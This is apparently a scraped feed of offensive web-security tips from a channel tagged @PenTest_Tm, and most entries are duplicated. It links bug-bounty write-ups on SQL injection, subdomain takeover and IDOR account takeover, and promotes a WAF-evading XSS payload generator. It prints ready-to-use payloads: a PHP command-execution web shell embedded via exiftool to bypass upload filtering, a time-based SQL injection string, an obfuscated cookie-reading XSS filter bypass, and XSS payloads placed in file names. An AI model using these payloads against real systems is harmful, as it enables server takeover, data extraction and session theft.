🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences
https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences
@PenTest_Tm
https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences
@PenTest_Tm
🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method
https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos
@PenTest_Tm
https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos
@PenTest_Tm
🗒 How I was able to discover ATO Via IDOR vulnerability
https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481
@PenTest_Tm
https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481
@PenTest_Tm
🗒 XSS Payload Generator
تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست
@PenTest_Tm
تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست
@PenTest_Tm
🗒 Bypass File Upload Filtering
In image:
@PenTest_Tm
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg
@PenTest_Tm
🗒 SQL Injection
After this, use sqlmap to extract the database
@PenTest_Tm
After this, use sqlmap to extract the database
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
@PenTest_Tm
🗒 Bypass XSS Filter with Array
@PenTest_Tm
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
@PenTest_Tm
🗒 File Upload via XSS
If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
@PenTest_Tm
If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
@PenTest_Tm